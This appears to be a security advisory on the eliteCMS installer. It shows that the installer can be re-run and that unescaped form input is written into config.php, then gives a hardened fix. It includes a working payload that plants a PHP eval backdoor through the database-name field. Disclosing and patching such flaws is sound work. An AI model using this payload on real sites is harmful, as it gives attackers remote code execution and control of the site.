eliteCMS's installer is not locked down after installation finishes, so an attacker can simply request the installer URL again and re-run the whole installation.

A second problem: the installer can be made to write a one-line PHP backdoor straight into admin/includes/config.php.
Let's look at the code:

...
elseif ($_GET['step'] == "4") {
    $file = "../admin/includes/config.php";
    $write = "<?php\n";
    $write .= "/**\n";
    $write .= "*\n";
    $write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";
    ... omitted ...
    $write .= "*\n";
    $write .= "*/\n";
    $write .= "\n";
    // The session values are interpolated into PHP source verbatim, with no escaping
    $write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";
    $write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";
    $write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";
    $write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";
    $write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";
    $write .= "if (!\$connection) {\n";
    $write .= "    die(\"Database connection failed\" .mysql_error());\n";
    $write .= "    \n";
    $write .= "} \n";
    $write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";
    $write .= "if (!\$db_select) {\n";
    $write .= "    die(\"Database select failed\" .mysql_error());\n";
    $write .= "    \n";
    $write .= "} \n";
    $write .= "?>\n";

    // The assembled source is written to config.php as-is
    $writer = fopen($file, 'w');
...
Now look at where those session values come from:

// Copied straight from the POSTed installer form
$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];
$_SESSION['DB_NAME'] = $_POST['DB_NAME'];
$_SESSION['DB_USER'] = $_POST['DB_USER'];
$_SESSION['DB_PASS'] = $_POST['DB_PASS'];
The values are accepted without any validation at all. If the database name is POSTed as:

"?><?php eval($_POST[c]);?><?php

the one-line backdoor is written into /admin/includes/config.php. The first `"` closes the string literal in the generated define() call, `?>` leaves PHP mode, the injected `<?php eval($_POST[c]);?>` block follows, and the trailing `<?php` re-enters PHP mode so the rest of the generated file continues. Because PHP parses the whole of config.php before executing any of it, whatever is injected must leave the surrounding code syntactically valid; a parse error in config.php means nothing in it, the shell included, ever runs. Combined with the unlocked installer, an attacker does not even need the site to be freshly installed: re-running the installer against an existing site is enough to overwrite config.php.
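How both problems can be closed in the installer's step 4, as an added example that is not eliteCMS's own code: the lock-file path, the allowed-character pattern and the helper names are assumptions made for this illustration. Values that will end up in generated PHP source are first restricted to characters a hostname, database name or user name actually needs, and everything, the password included, is emitted through var_export(), which produces a properly escaped single-quoted PHP literal (a `?>` inside a string literal does not leave PHP mode). The installer refuses to run once a lock file exists, and the lock is written only after config.php has been written successfully.

```php
<?php
// Added example, not eliteCMS code: a hardened replacement for step 4 of
// the installer. INSTALL_LOCK, CONFIG_FILE, the regex and the helper names
// are assumptions for this illustration.
session_start();

define('INSTALL_LOCK', dirname(__FILE__) . '/install.lock');
define('CONFIG_FILE',  dirname(__FILE__) . '/../admin/includes/config.php');

// Only what a hostname, database name or user name legitimately needs.
// Quotes, '<', '>', '?' and whitespace are rejected before they reach the file.
function valid_db_identifier($value)
{
    return is_string($value) && preg_match('/^[A-Za-z0-9_.\-]{1,64}$/', $value) === 1;
}

// Build config.php from the settings. var_export() emits a single-quoted PHP
// string with ' and \ escaped, so no value can terminate the literal or the
// <?php block; the identifier check additionally rejects anything odd.
function build_config(array $settings)
{
    foreach (array('DB_SERVER', 'DB_NAME', 'DB_USER') as $key) {
        if (!isset($settings[$key]) || !valid_db_identifier($settings[$key])) {
            throw new InvalidArgumentException("Rejected value for $key");
        }
    }
    if (!isset($settings['DB_PASS']) || !is_string($settings['DB_PASS'])) {
        throw new InvalidArgumentException('DB_PASS is required');
    }

    $out = "<?php\n";
    foreach (array('DB_SERVER', 'DB_NAME', 'DB_USER', 'DB_PASS') as $key) {
        $out .= sprintf("define('%s', %s);\n", $key, var_export($settings[$key], true));
    }
    $out .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";
    $out .= "if (!\$connection) {\n    die('Database connection failed' . mysql_error());\n}\n";
    $out .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";
    $out .= "if (!\$db_select) {\n    die('Database select failed' . mysql_error());\n}\n";
    // No closing ?> tag: anything after it (even a newline) would be sent to the client.
    return $out;
}

// Refuse to run again once installation has completed.
if (file_exists(INSTALL_LOCK)) {
    header('HTTP/1.1 403 Forbidden');
    exit('eliteCMS is already installed; remove the installer directory.');
}

if (isset($_GET['step']) && $_GET['step'] === '4') {
    $settings = array();
    foreach (array('DB_SERVER', 'DB_NAME', 'DB_USER', 'DB_PASS') as $key) {
        $settings[$key] = isset($_SESSION[$key]) ? $_SESSION[$key] : '';
    }

    try {
        $config = build_config($settings);
    } catch (InvalidArgumentException $e) {
        header('HTTP/1.1 400 Bad Request');
        exit('Installation aborted: ' . $e->getMessage());
    }

    if (file_put_contents(CONFIG_FILE, $config, LOCK_EX) === false) {
        exit('Could not write config.php');
    }
    // Lock only after config.php exists: a failed install can be retried,
    // a completed one cannot be re-run.
    touch(INSTALL_LOCK);
}
```

With this version the payload from above, `"?><?php eval($_POST[c]);?><?php`, is rejected by valid_db_identifier() before anything is written, and even a password containing quotes or `?>` is emitted as an inert string literal. The lock file is a belt-and-braces measure; deleting the installer directory after a successful install remains the right operational step.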